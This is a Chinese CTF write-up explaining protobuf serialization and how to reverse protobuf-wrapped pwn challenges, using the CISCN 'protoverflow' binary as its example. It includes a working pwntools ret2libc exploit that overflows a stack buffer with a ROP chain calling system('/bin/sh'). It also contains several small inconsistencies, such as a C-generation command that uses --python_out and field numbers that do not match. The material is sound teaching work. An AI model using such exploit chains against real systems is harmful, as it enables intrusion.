protobuf-pwn利用-先知社区

protobuf

简介

Protobuf（全称：Protocol Buffers）是 Google 开发的一种轻量、高效的结构化数据序列化协议。它用于将数据结构序列化为紧凑的二进制格式，用于网络通信或数据存储。Protobuf 被设计为跨平台和语言无关的，因此广泛应用于分布式系统、网络通信、远程过程调用（RPC）等场景

说人话就是，protobuf是一种传输方式，它能把程序中的数据（比如文本、数字）转换成一种非常紧凑的二进制格式，这样数据传输时占用更少的空间，速度也更快。

比如在你编写的程序里，你可能有一些数据想要传给另外一个程序（比如服务器或客户端）。如果用普通的方式传输，像 JSON 或 XML，数据会变得很大且传输慢。而 Protobuf 就把这些数据压缩成更小的格式，类似把一份内容很多的信件压缩成一个小包裹，传输起来更高效。

但是它压缩的数据是二进制的，所以人类看不懂，需要程序用对应的方式“解包”才能还原出原始数据。

但是这样怎么会对我们写题目有影响呢，重点其实在于protobuf支持多种语言，可以在不同的语言环境之间传递数据，比如，可以在一个Python程序中序列化数据，并在另一个C++程序中反序列化它。只需要在各自的语言中生成相应的代码并按照约定序列化和反序列化。

所以在pwn里面，我们写这种题目的难点就在逆向上面了，与常规的Pwn题利用相比，多套了一层Protobuf的解包操作，难度就在于怎么去和这种题目进行交互

protobuf 使用

既然是要逆向，我们首先还是要知道该这种方法是怎么进行转换的，那么首先，我们可以在linux系统下面用包管理器安装

sudo apt-get update
sudo apt-get install -y protobuf-compiler libprotobuf-dev

根据你使用的编程语言，安装相应的 Protobuf 库，以便在程序中序列化和反序列化数据，一般来说我们会需要python和c语言

使用

sudo apt-get install libprotobuf-c-dev protobuf-c-compiler

进行c语言的下载，protoc-c --version用这句来验证是否安装完成

然后就要进行正式的编写，这里可以编写一个uers.proto文件

syntax = "proto3";

message User {
  int32 id = 1;
  string name = 2;
  string email = 3;
}

然后使用以下命令生成C代码

protoc --python_out=. user.proto

这会在当前目录下生成两个文件：user.pb-c.h和user.pb-c.c

user.pb-c.h：头文件，定义了消息类型（如User结构体）及其相关的函数。

user.pb-c.c：源文件，实现了这些函数，包含序列化和反序列化等操作。

在你的C程序中，你需要包含生成的user.pb-c.h头文件，这样你就可以使用User消息类型及其相关的protobuf操作函数。

打个比方

#include <stdio.h>
#include <stdlib.h>
#include "user.pb-c.h"  // 包含生成的头文件

int main() {
    // 创建一个 User 对象，并初始化
    User user = USER__INIT;  // 生成的宏用于初始化User结构体
    user.id = 123;  // 设置用户ID
    user.name = "John Doe";  // 设置用户名
    user.email = "john.doe@example.com";  // 设置用户邮箱

    // 序列化消息
    size_t serialized_size = user__get_packed_size(&user);  // 获取序列化消息所需的大小
    void *buffer = malloc(serialized_size);  // 分配内存存放序列化数据
    user__pack(&user, buffer);  // 序列化数据到buffer

    printf("Serialized User data to %zu bytes\n", serialized_size);

    // 反序列化消息
    User *new_user = user__unpack(NULL, serialized_size, buffer);  // 从二进制数据反序列化为User对象
    if (new_user == NULL) {
        fprintf(stderr, "Error unpacking User message\n");
        return 1;
    }

    // 输出解包后的User数据
    printf("ID: %d\n", new_user->id);
    printf("Name: %s\n", new_user->name);
    printf("Email: %s\n", new_user->email);

    // 清理内存
    user__free_unpacked(new_user, NULL);  // 释放反序列化后的对象
    free(buffer);  // 释放序列化的缓冲区内存

    return 0;
}

然后我们对其进行编译

gcc -o my_program user.pb-c.c your_program.c -lprotobuf-c

在这个命令中：

user.pb-c.c 是由 protoc 生成的 C 源文件。
your_program.c 是编写的包含主程序的 C 文件。
-lprotobuf-c 指定链接 Protobuf-C 库。

在我的电脑里面，这个文件叫pwn.c，所以我的语句就是

gcc -o pwn user.pb-c.c pwn.c -lprotobuf-c

然后就可以看到，我们生成了一个pwn文件

那么这样的话，就算是完成的我们的使用，这个代码没有任何交互，所以直接运行是可以的

例题：protoverflow

工具

会使用之后，我们就要开始学习怎么去逆向这种题目

在我们的pwn题目中，大多数是需要交互的，所以我们必须逆向出结构体，用符合的交互方式才可以交互

一般来说我们选择使用工具（手搓也行）

在那之前，我们需要安装一些python的依赖库

pip install google
pip install protobuf

这里举两个题目作为例子，首先是ciscn华中赛区半决赛的protoverflow（天知道为什么国赛这么喜欢protobuf）

我们拿ida打开它

给了libc地址，然后回尝试解析protobuf结构体，如果解析成功，就会进入真正的主函数，也就是上面的sub_324A，我们尝试运行一下

报错显示没有找到对应的链接库，ldd查看之后，发现是libprotobuf.so.10 没有找到，但是附件其实给了，我们只需要改一下路径就好了

使用如下语句

ln -s /home/protobuf/protoverflow/libprotobuf.so.10 /usr/lib/libprotobuf.so.10

因为我的附件连接在/home/protobuf/protoverflow里面

现在可以正常运行了，但是我们正常往里面输入数据是会报错的，也就是提示protobuf错误，这也就是这种题目的考点，它无法正常输入数据，必须安装特定的格式进行交互，类似json类型的pwn

我们来看一下这个

v5 = google::protobuf::MessageLite::ParseFromArray((google::protobuf::MessageLite *)&unk_209080, s, v6);

里面调用的google::protobuf::MessageLite::ParseFromArray函数是迎来从给定的字节数组里面解析数据，并且将其填充到对应的protobuf结构体里面

google::protobuf::MessageLite 是一个抽象基类，它定义了所有 protobuf 消息的基本接口和操作。 ParseFromArray 是这个类中的一个成员函数，这个位置一般是会有两个参数，date和size，从一个给定大小的字节数组 ( data 开始，大小为 size ) 中解析 protobuf 消息

而在这里，这三个参数代表从字节数组 s 中读取 v6 个字节，并将解析得到的消息存储到 unk_209080中。如果解析成功， ParseFromArray将返回true；

这里给大家介绍一个工具

sudo apt install python3-pip git openjdk-11-jre libqt5x11extras5 python3-pyqt5.qtwebengine python3-pyqt5
sudo pip3 install protobuf pyqt5 pyqtwebengine requests websocket-client
git clone https://github.com/marin-m/pbtk
cd pbtk
./gui.py

我们选择第一个选项，然后进去选择我们要分析的pwn程序

就会在这个目录下面生成对应的protobuf文件，把它拿到我们exp的文件夹里面

可以看到，这是工具帮我们生成好的文件，大家应该注意到了里面是有两个不同选项的optional和required，optional表示可选项，而required表示需要写入

protoc --python_out=. message.proto

然后使用这个语句编译成可以导入到python的文件

得到对应文件之后，我们需要导入exp中

from pwn import *
import message_pb2

然后我们回到上面，可选项就代表可以自己输入，直接在对应结构体里面修改就可以，而需要输入的地方才是我们要注意的

回到ida里面看我们改写成功的位置

n [0] 是我们输入 buf 的大小，n [1] 是我们输入的内容。而前面可以设置最大为 0x1000 很明显有栈溢出漏洞。

from pwn import *
import message_pb2
io=process('./pwn')
libc=ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
io.recvuntil('Gift: ')
puts_addr=int(io.recv(14)[-12:].decode(),16)
success('puts_addr: '+hex(puts_addr))

libc_base=puts_addr-libc.sym['puts']
success('libc_base: '+hex(libc_base))
system=libc_base+libc.sym['system']
pop_rdi=libc_base+0x2a255
binsh=libc_base+0x19ce43
ret=libc_base+0x2868c
payload=b'a'*0x218+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)
message=message_pb2.protoMessage()
message.name=b'gets'
message.phoneNumber=b'260'
message.buffer=payload
message.size=len(payload)

payload=message.SerializeToString()
io.send(payload)
io.interactive()

我们来看exp为什么这么写，首先我们的输入必须按照格式写，所以中间的message都是固定格式，两个可选项我们自己安装对应的数据类型往里面输入就行，剩下两个需要我们自己填，buffer里面放上payload。最后与一行变成payload长度就行，当然现在为止这个payload都是不对的，我只是举个例子

可以看到，我们输入的数据是符合格式的，那剩下的部分就是简单的ret2libc，里面memcpy的复制漏洞就可以

手动

那如果我们手动逆向应该从哪里入手呢

我们先回到原始的.proto文件

// demo.proto
syntax = "proto3";

package tutorial;

message Person {
  string name = 1;
  int32 id = 2;
  string email = 3;

  enum PhoneType {
    PHONE_TYPE_UNSPECIFIED = 0;
    PHONE_TYPE_MOBILE = 1;
    PHONE_TYPE_HOME = 2;
    PHONE_TYPE_WORK = 3;
  }

  message PhoneNumber {
    string number = 1;
    PhoneType type = 2;
  }

  repeated PhoneNumber phones = 4;
}

message AddressBook {
  repeated Person people = 1;
}

每个字段而言都有一个修饰符（required/repeated/optional）、字段类型（bool/string/bytes/int32等）和字段标签(Tag)组成。

对于required的字段而言，初值是必须要提供的，否则字段的便是未初始化的。
对于optional的字段而言，如果未进行初始化，那么一个默认值将赋予该字段，当然也可以指定默认值，如上述proto定义中的PhoneType字段类型。
对于repeated的字段而言，该字段可以重复多个。
其中字段标签标示了字段在二进制流中存放的位置，这个是必须的，而且序列化与反序列化的时候相同的字段的Tag值必须对应，否则反序列化会出现意想不到的问题

也就是说，我们逆向的结构体里面一定会有类似的结构，所以我们的思路就是利用字符串这个东西，进行逆向，我们shift加f12打开字符串，搜索message

可以很轻易找到这些字符串，点击protoMessage可以找到对应位置，这是因为我们进行解析的时候，会用到unpack函数，而unpack函数传入描述消息结构体数据的descriptor。我们可以在IDA中分析descriptor还原消息结构体

选定好这些可见字符之后，按a可以变成字符串，其实这里就是我们的结构体

我们浅浅逆向一下

#include <stddef.h>

typedef struct {
    const char* name;         // 字段名称
    int number;              // 字段编号
    int label;               // 标签
    int type;                // 类型
    size_t quantifier_offset; // 数量偏移量
    size_t offset;           // 偏移量
    void* flags;             // 标志
    void* reserved[3];       // 保留字段
} ProtobufFieldDescriptor;

// 字段类型常量定义
#define PROTOBUF_C_LABEL_OPTIONAL 1
#define PROTOBUF_C_LABEL_REQUIRED 2
#define PROTOBUF_C_TYPE_STRING 1
#define PROTOBUF_C_TYPE_BYTES 2
#define PROTOBUF_C_TYPE_UINT32 3

// 定义描述符
static const ProtobufFieldDescriptor protoMessage__field_descriptors[] = {
    {
        "name",                  // 字段名
        1,                       // 字段编号
        PROTOBUF_C_LABEL_OPTIONAL, // 标签
        PROTOBUF_C_TYPE_STRING,   // 类型
        0,                       // 数量偏移量
        offsetof(protoMessage, name), // 偏移量
        NULL,                    // 标志
        {0, NULL, NULL}         // 保留字段
    },
    {
        "phoneNumber",
        2,
        PROTOBUF_C_LABEL_OPTIONAL,
        PROTOBUF_C_TYPE_STRING,
        0,
        offsetof(protoMessage, phoneNumber),
        NULL,
        {0, NULL, NULL}
    },
    {
        "buffer",
        3,
        PROTOBUF_C_LABEL_REQUIRED,
        PROTOBUF_C_TYPE_BYTES,
        0,
        offsetof(protoMessage, buffer),
        NULL,
        {0, NULL, NULL}
    },
    {
        "size",
        4,
        PROTOBUF_C_LABEL_REQUIRED,
        PROTOBUF_C_TYPE_UINT32,
        0,
        offsetof(protoMessage, size),
        NULL,
        {0, NULL, NULL}
    }
};

这是逆向完后的结果，但是我们需要提前知道一些定义

ProtobufCFieldDescriptor结构体

struct ProtobufCFieldDescriptor {
    /** Name of the field as given in the .proto file. */
    const char      *name;

    /** Tag value of the field as given in the .proto file. */
    uint32_t        id;

    /** Whether the field is `REQUIRED`, `OPTIONAL`, or `REPEATED`. */
    ProtobufCLabel      label;

    /** The type of the field. */
    ProtobufCType       type;

    /**
     * The offset in bytes of the message's C structure's quantifier field
     * (the `has_MEMBER` field for optional members or the `n_MEMBER` field
     * for repeated members or the case enum for oneofs).
     */
    unsigned        quantifier_offset;

    /**
     * The offset in bytes into the message's C structure for the member
     * itself.
     */
    unsigned        offset;

    /**
     * A type-specific descriptor.
     *
     * If `type` is `PROTOBUF_C_TYPE_ENUM`, then `descriptor` points to the
     * corresponding `ProtobufCEnumDescriptor`.
     *
     * If `type` is `PROTOBUF_C_TYPE_MESSAGE`, then `descriptor` points to
     * the corresponding `ProtobufCMessageDescriptor`.
     *
     * Otherwise this field is NULL.
     */
    const void      *descriptor; /* for MESSAGE and ENUM types */

    /** The default value for this field, if defined. May be NULL. */
    const void      *default_value;

    /**
     * A flag word. Zero or more of the bits defined in the
     * `ProtobufCFieldFlag` enum may be set.
     */
    uint32_t        flags;

    /** Reserved for future use. */
    unsigned        reserved_flags;
    /** Reserved for future use. */
    void            *reserved2;
    /** Reserved for future use. */
    void            *reserved3;
};

label和type

label和type都是枚举类型，我们看一下它的定义：

typedef enum {
    /** A well-formed message must have exactly one of this field. */
    PROTOBUF_C_LABEL_REQUIRED,

    /**
     * A well-formed message can have zero or one of this field (but not
     * more than one).
     */
    PROTOBUF_C_LABEL_OPTIONAL,

    /**
     * This field can be repeated any number of times (including zero) in a
     * well-formed message. The order of the repeated values will be
     * preserved.
     */
    PROTOBUF_C_LABEL_REPEATED,

    /**
     * This field has no label. This is valid only in proto3 and is
     * equivalent to OPTIONAL but no "has" quantifier will be consulted.
     */
    PROTOBUF_C_LABEL_NONE,
} ProtobufCLabel;

typedef enum {
    PROTOBUF_C_TYPE_INT32,      /**< int32 */
    PROTOBUF_C_TYPE_SINT32,     /**< signed int32 */
    PROTOBUF_C_TYPE_SFIXED32,   /**< signed int32 (4 bytes) */
    PROTOBUF_C_TYPE_INT64,      /**< int64 */
    PROTOBUF_C_TYPE_SINT64,     /**< signed int64 */
    PROTOBUF_C_TYPE_SFIXED64,   /**< signed int64 (8 bytes) */
    PROTOBUF_C_TYPE_UINT32,     /**< unsigned int32 */
    PROTOBUF_C_TYPE_FIXED32,    /**< unsigned int32 (4 bytes) */
    PROTOBUF_C_TYPE_UINT64,     /**< unsigned int64 */
    PROTOBUF_C_TYPE_FIXED64,    /**< unsigned int64 (8 bytes) */
    PROTOBUF_C_TYPE_FLOAT,      /**< float */
    PROTOBUF_C_TYPE_DOUBLE,     /**< double */
    PROTOBUF_C_TYPE_BOOL,       /**< boolean */
    PROTOBUF_C_TYPE_ENUM,       /**< enumerated type */
    PROTOBUF_C_TYPE_STRING,     /**< UTF-8 or ASCII string */
    PROTOBUF_C_TYPE_BYTES,      /**< arbitrary byte sequence */
    PROTOBUF_C_TYPE_MESSAGE,    /**< nested message */
} ProtobufCType;

看最上面的图片，在汇编中，字段名（例如 name、phoneNumber，buffer）是以 db 指令定义的，后跟字段名的字符串和其他属性。

字段编号在汇编中通常紧随其后，表示字段在 Protobuf 消息中的位置。例如，1 表示 name 字段是第一个字段。

标签和类型的定义通常可以在汇编中找到，例如使用十六进制数（18h 表示字段类型）和额外的信息（例如 optional 或 required）

offsetof 用于计算字段在结构体中的位置，通常在描述符生成时需要这部分信息

在 Protobuf 字段描述符中，标志字段（通常称为 flags）可以用于存储有关字段的附加信息或元数据。例如，标志可以指示某个字段是否为只读、是否需要进行特殊处理，或是否存在某些约束条件，在初始设计阶段，开发者可能尚未定义任何特定的标志，因此将其设置为 NULL 作为占位符，待后续需求明确后再决定如何使用

最后还有保留字段，当 Protobuf 消息格式发生变化时，保留字段可以确保旧版本的代码仍然可以处理新版本的消息，而不会引发解析错误。

如果开发者在将来的版本中需要添加新字段，可以简单地在保留字段之后添加，而不影响已有字段的解析。

我们以name为例

.rodata:0000000000006502 aName           db 4,'name'//长度和字段名
.rodata:0000000000006507                 db  18h
.rodata:0000000000006508                 db    1//字段编号
.rodata:0000000000006509                 db  20h
.rodata:000000000000650A                 db    1//修饰符（为1表示required
.rodata:000000000000650B                 db  28h ; (
.rodata:000000000000650C                 db    9//数据类型(存疑)
.rodata:000000000000650D                 db  12h
.rodata:000000000000650E                 db  13h
.rodata:000000000000650F                 db  0Ah

修饰符的数据代表，上面有源代码对应

1: required（字段是必需的，必须被设置）

2: optional（字段是可选的，可以存在也可以不存在）

3: repeated（字段可以出现多次，表示一个数组或列表）

但是这里有个存疑，明明9对应的不是字符串，但是最后确实是字符串类型，利用chatgpt也是这样，不知道是不是版本的原因，暂时还没有结果,但是我只在这一题遇见了，恰好这题又可以使用工具，暂且搁置

最后需要注意如何区分程序用的是proto2还是3。

在proto3中，删除了字段的默认值，因此ProtobufCFieldDescriptor结构体中没有了default_value字段。

也可以根据特点

Proto2: 支持 required 和 optional 修饰符。

Proto3: 默认所有字段为 optional，不支持 required

最后可以根据逆向后字段的数量来判断题目用的proto版本。
剩下的各个部分都可以这么做，最后就可以还原成

syntax = "proto2";
message ProtoMessage {
    optional string name = 3;
    optional string phone_number = 4;
    required bytes buffer = 5;
    required uint32 size = 6;
}

然后protoc --python_out=. proto_message.proto
即可